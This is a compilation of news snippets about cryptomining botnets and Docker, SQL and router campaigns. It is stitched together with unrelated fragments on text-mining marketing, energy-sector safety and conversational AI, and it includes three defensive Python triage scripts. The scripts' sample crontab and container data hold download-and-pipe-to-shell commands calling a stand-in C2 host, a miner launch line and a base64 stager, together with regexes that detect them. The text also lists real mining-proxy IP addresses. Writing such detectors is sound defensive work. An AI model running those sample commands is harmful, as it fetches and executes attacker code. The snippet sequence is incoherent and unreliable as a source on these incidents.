Prometei is a crypto-mining botnet that recently appeared in the threat landscape. Security experts from Cisco Talos, who discovered and tracked it, report that it exploits the Microsoft Windows SMB protocol for lateral movement.
The executable then downloads a text file containing XMRig configuration details to initiate mining activities. “Individuals in the recruitment process should verify the authenticity of CrowdStrike communications and avoid downloading unsolicited files,” concludes the report.
The malware uses the victim’s resources to mine cryptocurrency, steals cryptocurrency wallet-related files, and replaces wallet addresses in the clipboard to hijack cryptocurrency payments. “Both of these programs are set up to connect to an operator-controlled mining server over the Tor proxy,” reads the report.
Group-IB, an international company specializing in the prevention of cyberattacks, is recording new outbreaks of illegal mining (cryptojacking) in the networks of commercial and state organizations.
The ongoing Ngrok mining botnet campaign is targeting servers hosted on popular cloud platforms, including Alibaba Cloud, Azure, and AWS. “Ngrok Mining Botnet is an active campaign targeting exposed Docker servers in AWS, Azure, and other cloud platforms,” continues the report.
“These particular applications are targeted because they often run on systems that have powerful underlying hardware with significant amounts of memory and powerful CPUs—all of which allow threat actors to maximize their ability to monetize these resources through mining cryptocurrency.”
The VictoryGate bot propagates via infected USB devices. It was designed to mine Monero by abusing the resources of compromised devices, and it is also able to deliver additional payloads. The malware uses a stratum/XMRig proxy to hide the mining pool and terminates the mining process when the user opens Task Manager, so that the CPU usage is not visible.
Experts uncovered a hacking campaign that is breaching Docker clusters to deploy a new crypto-mining malware tracked as Kinsing. The Kinsing malware abuses the resources of the Docker installations to mine cryptocurrency; the attackers exploit an unprotected, exposed Docker API port to instantiate an Ubuntu container.
A few days ago EVRAZ, one of the world’s largest multinational vertically integrated steel making and mining companies, was hit by the Ryuk ransomware. “IT officials are working to get the communication systems back online.” “911 calls, though, are being answered.”
For communication, it uses a Unix socket internally and Tor externally. The malicious code copies itself to various disk locations using deceptive names and establishes a backdoor on the server for Tor communications. “Once unpacked and decrypted it communicates with cryptomining pools,” reads the report.
“This script also starts an SSH daemon inside the container for remote communication.” “The script then calls a Monero coin-mining binary, darwin (detected as PUA.Linux.XMRMiner.AA), to run in the background. It also checks if the Docker host already runs a cryptocurrency-mining container and deletes it if it exists.”
Sophos researchers who investigated the recently uncovered crypto-mining campaign targeting SQL servers with MrbMiner malware believe that it was conducted by an Iran-based company. The experts discovered that the cryptominer was downloaded from the vihansoft.ir, mrbfile, and mrbftp domains and communicated with the poolmrb/mrbpool domains.
Trend Micro Says It Moved Cranes Using RF Software Flaws: radio controllers used in the construction, mining and shipping industries are dangerously vulnerable to hackers, Trend Micro says in a new report.
Over the past year, ExCobalt targeted Russian organizations in the following industries: metallurgy, telecommunications, mining, information technology, government, and software development. Cobalt’s hallmark was the use of the CobInt tool, the same tool that ExCobalt began using in 2022.
Security researchers at Trend Micro have discovered a new Android crypto-currency mining botnet that spreads via open ADB (Android Debug Bridge) ports and Secure Shell (SSH).
Earlier this year Sysdig and Aqua Security researchers started observing cyber attacks targeting Kubernetes and Docker instances aimed at mining Monero cryptocurrency. Miscreants can abuse the Docker Engine API to deploy containers they have created with the specific intent of mining cryptocurrencies.
The Windows botnet has been active since late 2017; it was mainly used to mine cryptocurrency, but it was also involved in DDoS attacks in 2018. “Communication with C&C servers is based on DNS requests and it uses a special mechanism translating DNS results to a real IP address,” concludes the analysis.
Initially, they deployed and executed a separate Monero miner alongside the usual RapperBot binary, but starting from January 2023, they included the mining capabilities in the bot. The malware decodes the mining pools and Monero wallet addresses and updates the configuration before starting the embedded miner.
The attackers injected a command that relies on a PowerShell script to download and execute a script to spin up XMRig from a remote mining pool. The bot also connects to the command and control domain p.findmeatthe[.]top, which was observed in Muhstik botnet activities, and communicates via Internet Relay Chat.
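The two entries above describe the same artefact from two sides: a bot that decodes its mining pools and Monero wallet address from an embedded configuration before starting the miner, and a report that publishes the resulting C2 name in defanged form. During triage those values are usually recoverable from a dropped binary's string table without running it. The following is an added example, not code from the articles or from the malware families named here: the regexes are heuristics (Monero standard and subaddresses are 95 base58 characters starting with 4 or 8, integrated addresses 106 starting with 4), the sample blob is constructed for the demonstration, and the pool, wallet and endpoint values in it are fictitious apart from the proxy address quoted elsewhere on this page.

```python
import json
import re
from typing import Dict, List

# Base58 alphabet used by Monero addresses (no 0, O, I or l).
B58 = r"[1-9A-HJ-NP-Za-km-z]"
# Integrated address (106 chars, starts with 4) or standard/subaddress (95 chars, starts with 4 or 8),
# not embedded in a longer base58 run.
MONERO_ADDR = re.compile(rf"(?<!{B58})(?:4{B58}{{105}}|[48]{B58}{{94}})(?!{B58})")
# Miner-style pool URLs as passed to XMRig's -o / "url" settings.
STRATUM_URL = re.compile(r"stratum\+(?:tcp|ssl|tls)://[A-Za-z0-9.\-]+(?::\d{1,5})?", re.I)
# Bare host:port pairs (IP or domain), e.g. mining proxies.
HOST_PORT = re.compile(r"\b(?:(?:\d{1,3}\.){3}\d{1,3}|(?:[a-z0-9-]+\.)+[a-z]{2,})(?::\d{2,5})\b", re.I)
# Same idea as the `strings` tool: runs of at least six printable ASCII bytes.
PRINTABLE = re.compile(rb"[\x20-\x7e]{6,}")


def refang(s: str) -> str:
    """Undo the usual analyst defanging ("[.]", "hxxp") so indicators match."""
    return s.replace("[.]", ".").replace("(.)", ".").replace("hxxp", "http")


def extract_mining_iocs(blob: bytes) -> Dict[str, List[str]]:
    """Pull wallet addresses, stratum pool URLs and host:port endpoints out of a binary blob."""
    found: Dict[str, List[str]] = {"wallets": [], "pools": [], "endpoints": []}
    for m in PRINTABLE.finditer(blob):
        s = refang(m.group().decode("ascii"))
        found["wallets"] += MONERO_ADDR.findall(s)
        pools = STRATUM_URL.findall(s)
        found["pools"] += pools
        for hp in HOST_PORT.findall(s):
            # A host:port already reported as part of a stratum URL is not a separate endpoint.
            if not any(hp in p for p in pools):
                found["endpoints"].append(hp)
    # De-duplicate while preserving discovery order.
    return {k: list(dict.fromkeys(v)) for k, v in found.items()}


# Constructed sample: a fake miner string table with an ELF-like header, NUL-separated strings,
# a defanged pool, a fictitious 95-character wallet and a plain host:port proxy. Not real malware.
SAMPLE_BLOB = (
    b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8
    + b"-o stratum+tcp://pool.example[.]net:3333 -u "
    + b"4" + b"AbCdEfGhJkMnPqRsTuVwXyZ1234567" * 3 + b"89ab"
    + b" -p x --donate-level=0\x00"
    + b"proxy 66.70.218.40:8080\x00"
    + b"https://github.com/example/updater\x00"
    + b'{"url":"xmr.pool.invalid:4444"}\x00'
)

if __name__ == "__main__":
    print(json.dumps(extract_mining_iocs(SAMPLE_BLOB), indent=2))
```

The refang step matters when the input is a string dump pasted from a report rather than the binary itself; the host:port pattern will also pick up legitimate update servers, so the output is a candidate list to check against pool and proxy blocklists, not a verdict.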
“In this network with no single point of failure, peers constantly communicate with each other to keep the network alive, resilient and up-to-date.” The botnet’s P2P communication is encrypted using AES for symmetric encryption and the Diffie-Hellman protocol for key exchange.
Experts pointed out that the bot doesn’t contain any offensive features, such as the ability to launch DDoS attacks or to mine cryptocurrency, a circumstance that suggests the malware is under development. “In the current version, each node cannot send control commands to its peers,” concludes the post.
The malicious code relies on a built-in Tor network tunnel for C2 communications, and it supports an update and delivery functionality through trusted services such as GitLab, GitHub, and Bitbucket. Kaspersky discovered that the detections between 2017 and 2022 had previously been misclassified as a cryptocurrency miner.
“RedFoxtrot has primarily targeted aerospace and defense, government, telecommunications, mining, and research organizations in Afghanistan, India, Kazakhstan, Kyrgyzstan, Pakistan, Tajikistan, and Uzbekistan. [...] located in Wuhan,” concludes the report.
“Unlike the aforementioned IoT botnets, this one tries to be more stealthy and persistent once the device is compromised, and it does not (yet) do the usual stuff a botnet does like DDoS, attacking all the devices connected to the internet, or, of course, mining cryptocurrencies,” concludes the analysis.
Cado Security researchers warn that the P2Pinfect worm is being used in attacks against Redis servers, aimed at deploying both ransomware and cryptocurrency mining payloads.
The energy and resources sector, including utilities, oil and gas, chemicals, and metals & mining, is one of the most hazardous in the world. Despite its hazardous nature, safety performance has continually improved over the last four decades. Elevate customer communications with empathy during emergency response.
The crypto-mining botnet has a modular structure and employs multiple techniques to infect systems and evade detection. The main module then retrieves the actual crypto-mining payload and the other modules; it also establishes persistence on the infected systems and ensures C2 communications.
Security experts from Trend Micro have analyzed the communication protocols used by cranes, hoists, drills and other industrial machines and discovered several vulnerabilities in them.
“It handles hundreds of bots, each communicating with the C&C to receive new targets, perform brute force attacks, install backdoors, and expand the size of the botnet,” reads the first of two reports published by the experts detailing the DevOps implementation behind the botnet.
This malware relies on the i2p (Invisible Internet Project) anonymization network for communication. The malicious code uses i2p to download malicious components and send mined currency to the attacker’s wallet. Today, many malicious applications continue to go undetected by most AV vendors.
Dig out trapped insights with text mining: traditional methods for gaining customer insights – like combing through 3rd-party review websites, Google Analytics, competitive research, and survey results – are slow and expensive. They also leave a lot of the good stuff buried because it’s too difficult to pull out. What is text mining?
The bug affected the OCA’s Diameter Signalling Router component and its Communications Services Gatekeeper. The critical patch advisory for 2019 also fixed the CVE-2018-11776 vulnerability (an Apache Struts remote code execution flaw) in the OCA’s Communications Policy Management component; this issue was exploited in 2018 by threat actors to mine cryptocurrency.
Such components could be interpreted as a subclass of AI agents responsible for orchestrating the communication workflow between the end user (consumer) and the AI. At some point, conversational AI platforms begin to replace traditional communication channels.
This directory contains the crypto-mining module named kswapd0, a name chosen to blend in with the Linux kernel’s swap daemon thread of the same name in process listings. This component has two main functions. Install a crypto-miner worker: the main purpose of this ELF file is the instantiation of a crypto-mining worker; it is a fork of the XMRig project, one of the most popular programs for mining Monero.
The crypto-mining botnet has a modular structure and employs multiple techniques to infect systems and evade detection. “The different components work together to enable the malware to perform many tasks: credential harvesting, spreading across the network, establishing C2 communications and more,” concludes the report.
Earlier in August, experts uncovered a massive cryptojacking campaign that was targeting MikroTik routers to inject a Coinhive cryptocurrency mining script into the web traffic. The communication ports associated with Winbox and Webfig are TCP/8291, TCP/80, and TCP/8080.
On June 6, 2021, Conti underling “Begemot” pitched Stern on a scheme to rip off a bunch of people mining virtual currencies, by launching distributed denial-of-service (DDoS) attacks against a cryptocurrency mining pool. Find a place where crypto holders communicate (discord, etc.). Most likely it will be IPv6.
Dark Utilities is advertised as a platform to enable remote access, command execution, distributed denial-of-service (DDoS) attacks and cryptocurrency mining operations on infected systems. Launched in early 2022, the platform provides full-featured C2 capabilities to its users.
Evasion and persistence: the botnet achieves persistence in multiple ways; it kills running processes that potentially compete for mining resources and eliminates EDR. It tries to infect hosts the system has connected to previously. The miner ELF binaries connect to the following mining proxy servers: 66.70.218.40:8080, [...]:8080 and 134.122.17.13:8080.
The attackers compromised a font package installed by a PDF editor app and used it to spread a crypto-mining malware on victims’ machines. The attackers decompiled and modified one MSI file, an Asian fonts pack, to add the malicious payload with the coin mining code.
The reliance on virtual meetings has skyrocketed after the pandemic, making platforms like Google Meet and Zoom integral to our daily personal and professional communication. Matanbuchus (a malware loader) and XMRig (a cryptocurrency miner): these strains can slow down systems while surreptitiously using computing resources for mining.
“I suspect it’s probably a derivative of other IoT crypto mining botnets,” Cashdollar told The Register. “This one seems to target enterprise systems.” Additionally, the malware installs a shell script that it uses to communicate with the command and control server. It gains persistence by adding entries to crontab.
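Crontab entries are the persistence mechanism named in the entry above, and the earlier description of a botnet that “achieves persistence in multiple ways” and kills competing miners points at the same place to look. The script below is an added example, not code from either article or from the malware they describe: it parses user-crontab lines (the `crontab -l` format, five schedule fields or an `@` keyword followed by the command) and flags the patterns these campaigns share. The indicator list is a heuristic of the editor's choosing, and the sample crontab is constructed; the hosts and paths in it are fictitious.

```python
import re
from typing import List, Tuple

# User crontab line: five schedule fields (or an @keyword) followed by the command.
# System crontabs (/etc/cron.d) carry an extra user field and are not handled here.
CRON_LINE = re.compile(r"^\s*(@\w+|(?:\S+\s+){5})(.*)$")

# Command-side indicators seen in cryptojacking cron persistence (heuristic, not exhaustive).
SUSPICIOUS = [
    (re.compile(r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:ba)?sh\b", re.I), "downloads and pipes to a shell"),
    (re.compile(r"base64\s+(?:-d|--decode)\b", re.I), "decodes a base64 payload"),
    (re.compile(r"(?:^|[\s/])(?:/tmp|/dev/shm|/var/tmp)/"), "runs from a world-writable directory"),
    (re.compile(r"xmrig|stratum\+(?:tcp|ssl)|kswapd0|--donate-level", re.I), "miner indicator"),
]


def triage_crontab(text: str) -> List[Tuple[str, List[str]]]:
    """Return (line, reasons) for every crontab entry that matches a persistence/miner pattern."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = CRON_LINE.match(line)
        if not m:
            continue
        sched, cmd = m.group(1).strip(), m.group(2).strip()
        reasons = []
        # Schedule-side indicators: re-launch at boot, or a beaconing cadence of every N minutes.
        if sched == "@reboot":
            reasons.append("re-executes at boot")
        elif re.fullmatch(r"\*/\d+(\s+\*){4}", sched):
            reasons.append(f"high-frequency schedule ({sched})")
        for rx, why in SUSPICIOUS:
            if rx.search(cmd):
                reasons.append(why)
        if reasons:
            findings.append((line.strip(), reasons))
    return findings


# Constructed sample crontab: one benign renewal job and three entries of the kind
# dropped by miner botnets (download-and-run beacon, boot-time miner, encoded stager).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * 1 /usr/bin/certbot renew --quiet
*/5 * * * * curl -fsSL http://c2.example.invalid/x.sh | sh > /dev/null 2>&1
@reboot /tmp/.X11-unix/kswapd0 -o stratum+tcp://xmr.pool.invalid:3333 --donate-level=0
30 2 * * * echo aGVsbG8K | base64 -d > /var/tmp/.p; sh /var/tmp/.p
"""

if __name__ == "__main__":
    for entry, reasons in triage_crontab(SAMPLE_CRONTAB):
        print(entry)
        for r in reasons:
            print("   -", r)
```

Run it over `crontab -l -u <user>` output for each account, and separately over `/etc/cron.d` after stripping the user field; a single benign hit (a backup script that lives in /var/tmp, say) is normal, but an entry that collects two or more of these reasons is worth pulling the referenced file for.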
“In this new attack, the threat actor first externally scans a given IP range by sending a TCP SYN packet to port 2375, the default port used for communicating with the Docker daemon,” reads the analysis published by Trend Micro.
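Port 2375 is the Docker daemon's plaintext TCP listener, and everything the Kinsing, Ngrok and Trend Micro entries describe (instantiating an Ubuntu container, checking whether a mining container already runs and deleting it) is done through the same REST API that `docker ps` uses. A defender with socket access can read it back the other way. The code below is an added example, not code from any of the articles or from Docker: it takes the JSON list that `GET /containers/json` returns (field names `Id`, `Image`, `Command`, `Mounts`, `HostConfig.NetworkMode` are the Docker Engine API's) and flags containers that look like the ones these campaigns create. The sample list is constructed, the indicator regexes are the editor's heuristics, and the hosts in the sample are fictitious.

```python
import json
import re
from typing import Dict, List

# Indicators drawn from the cryptojacking cases on this page: XMRig/stratum strings, a
# kernel-thread lookalike binary name, and "download and pipe to a shell" launch commands.
MINER_CMD = re.compile(r"xmrig|stratum\+(?:tcp|ssl)|--donate-level|kswapd0|minerd|cryptonight", re.I)
PIPE_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:ba)?sh\b", re.I)
# Host paths that give a container control of the host when bind-mounted.
SENSITIVE_MOUNTS = ("/", "/root", "/etc", "/var/run/docker.sock", "/proc", "/sys")


def triage_container(c: Dict) -> List[str]:
    """Return the reasons one /containers/json entry looks like an attacker-created miner."""
    reasons = []
    cmd = c.get("Command") or ""
    if MINER_CMD.search(cmd):
        reasons.append("miner indicator in command: " + cmd)
    if PIPE_TO_SHELL.search(cmd):
        reasons.append("download-and-execute launch: " + cmd)
    for m in c.get("Mounts") or []:
        src = m.get("Source", "")
        if m.get("Type") == "bind" and src in SENSITIVE_MOUNTS:
            reasons.append(f"host path {src} bind-mounted at {m.get('Destination')}")
    if (c.get("HostConfig") or {}).get("NetworkMode") == "host":
        reasons.append("runs in the host network namespace")
    return reasons


def triage(containers: List[Dict]) -> Dict[str, List[str]]:
    """Map short container ID -> reasons, for every container with at least one finding."""
    return {c["Id"][:12]: r for c in containers if (r := triage_container(c))}


# Constructed sample in the shape of GET /containers/json: a benign web server, a container
# launched with a download-and-run command and the host root mounted, and a bare miner.
SAMPLE_CONTAINERS = [
    {
        "Id": "c0ffee000001" + "0" * 52,
        "Image": "nginx:1.25",
        "Command": "nginx -g 'daemon off;'",
        "Mounts": [{"Type": "bind", "Source": "/srv/www", "Destination": "/usr/share/nginx/html"}],
        "HostConfig": {"NetworkMode": "bridge"},
    },
    {
        "Id": "deadbeef0001" + "0" * 52,
        "Image": "ubuntu:latest",
        "Command": "/bin/bash -c \"curl -fsSL http://c2.example.invalid/x.sh | sh\"",
        "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/mnt"}],
        "HostConfig": {"NetworkMode": "bridge"},
    },
    {
        "Id": "deadbeef0002" + "0" * 52,
        "Image": "alpine:latest",
        "Command": "./kswapd0 -o stratum+tcp://xmr.pool.invalid:3333 -k",
        "Mounts": [],
        "HostConfig": {"NetworkMode": "host"},
    },
]

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_CONTAINERS), indent=2))
```

To feed it live data, `curl --unix-socket /var/run/docker.sock http://localhost/containers/json` gives exactly this list for the local daemon. The structural fix is upstream of the triage: do not bind the daemon to `tcp://0.0.0.0:2375` at all, and where remote access is required use the TLS listener (2376 with `--tlsverify` and client certificates) behind a firewall rule, since the plaintext API performs no authentication.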